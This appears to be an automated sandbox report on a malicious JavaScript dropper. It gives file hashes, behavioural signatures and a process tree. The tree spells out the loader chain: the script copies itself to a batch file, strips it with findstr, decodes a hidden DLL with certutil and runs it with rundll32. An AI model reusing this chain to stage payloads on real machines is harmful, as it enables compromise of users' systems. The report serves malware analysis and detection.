Resubmissions
19-02-2024 19:16
240219-xzannsbc6y 1019-02-2024 19:12
240219-xwla1abb8z 106-02-2024 16:53
240206-veee1sbeb4 10Analysis
-
max time kernel
92s -
max time network
134s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19-02-2024 19:16
Static task
static1
General
-
Target
1727822909290912689.js
-
Size
647KB
-
MD5
9d68a860c54584dd2d52f465160ee6ad
-
SHA1
42270d711512467421fd9f15530a70476f383172
-
SHA256
cf66b2a95512490b690794f70d6c847aa8047bee3975c1eb46a7a892f74b9cff
-
SHA512
352838f21a3664f308327c3e9e7f318d3af3480f0fcf952c2ae9cbd647826baf29274db0545822ff13365271ae2638f3a7b662caf40744b14cf6502abbad0539
-
SSDEEP
6144:GYkeuxJrlxHlmMkIKjT5/gId68KpldKlZk7bm0KGm63EYnkkenxf2SeefVZwzqzs:GY7orJGIS/gIl3NGN0YnkR+tfVWE
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation wscript.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 4148 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
wscript.execmd.execmd.exedescription pid process target process PID 4208 wrote to memory of 1620 4208 wscript.exe cmd.exe PID 4208 wrote to memory of 1620 4208 wscript.exe cmd.exe PID 1620 wrote to memory of 1916 1620 cmd.exe findstr.exe PID 1620 wrote to memory of 1916 1620 cmd.exe findstr.exe PID 1620 wrote to memory of 2656 1620 cmd.exe certutil.exe PID 1620 wrote to memory of 2656 1620 cmd.exe certutil.exe PID 1620 wrote to memory of 1708 1620 cmd.exe cmd.exe PID 1620 wrote to memory of 1708 1620 cmd.exe cmd.exe PID 1708 wrote to memory of 4148 1708 cmd.exe rundll32.exe PID 1708 wrote to memory of 4148 1708 cmd.exe rundll32.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1727822909290912689.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\1727822909290912689.js" "C:\Users\Admin\\yelltame.bat" && "C:\Users\Admin\\yelltame.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\findstr.exefindstr /V complexsugar ""C:\Users\Admin\\yelltame.bat""3⤵
-
C:\Windows\system32\certutil.execertutil -f -decode cherryargument high-pitchedhandsomely.dll3⤵
-
C:\Windows\system32\cmd.execmd /C rundll32 high-pitchedhandsomely.dll,main3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exerundll32 high-pitchedhandsomely.dll,main4⤵
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\cherryargumentFilesize
306KB
MD5e0ab76e2f14e9a8d3314f0d88924c318
SHA1debed77dc28f418fa1d4d3c76d11f543cd75ce73
SHA256ea11fda572f1131a0e002d3475324411aee6c8760ac69e7118f13170521913ca
SHA512e978e6f237aff763f8a87f6fc81c6f82bd98afdf210c3f4d2fa88df06ac0d2d421cbbc845d40ff2441a725d0392ecc8e0d0daeac48d49cad6d3cf5a1c08d91ac
-
C:\Users\Admin\high-pitchedhandsomely.dllFilesize
229KB
MD57510774ef92e9c6a391b92a0bd3f408b
SHA1741652f31e83c6ed6908ed4e0cfc46f79451d985
SHA2564254817a71122bb75a09cfa918c3a5c8fac4b44c2073cb5f62f25931531c739c
SHA512a5a6a058975bdef39be187104895be1656ee8547abd9cdbe0713cf4f7a7f92e5f5c901edf7ba4dd18bd6a9e65631e64f73a681ab3563f8eed00381c257b32264
-
C:\Users\Admin\yelltame.batFilesize
647KB
MD59d68a860c54584dd2d52f465160ee6ad
SHA142270d711512467421fd9f15530a70476f383172
SHA256cf66b2a95512490b690794f70d6c847aa8047bee3975c1eb46a7a892f74b9cff
SHA512352838f21a3664f308327c3e9e7f318d3af3480f0fcf952c2ae9cbd647826baf29274db0545822ff13365271ae2638f3a7b662caf40744b14cf6502abbad0539
-
memory/4148-198-0x00007FFF627B0000-0x00007FFF627F1000-memory.dmpFilesize
260KB
-
memory/4148-199-0x0000018CE0550000-0x0000018CE0573000-memory.dmpFilesize
140KB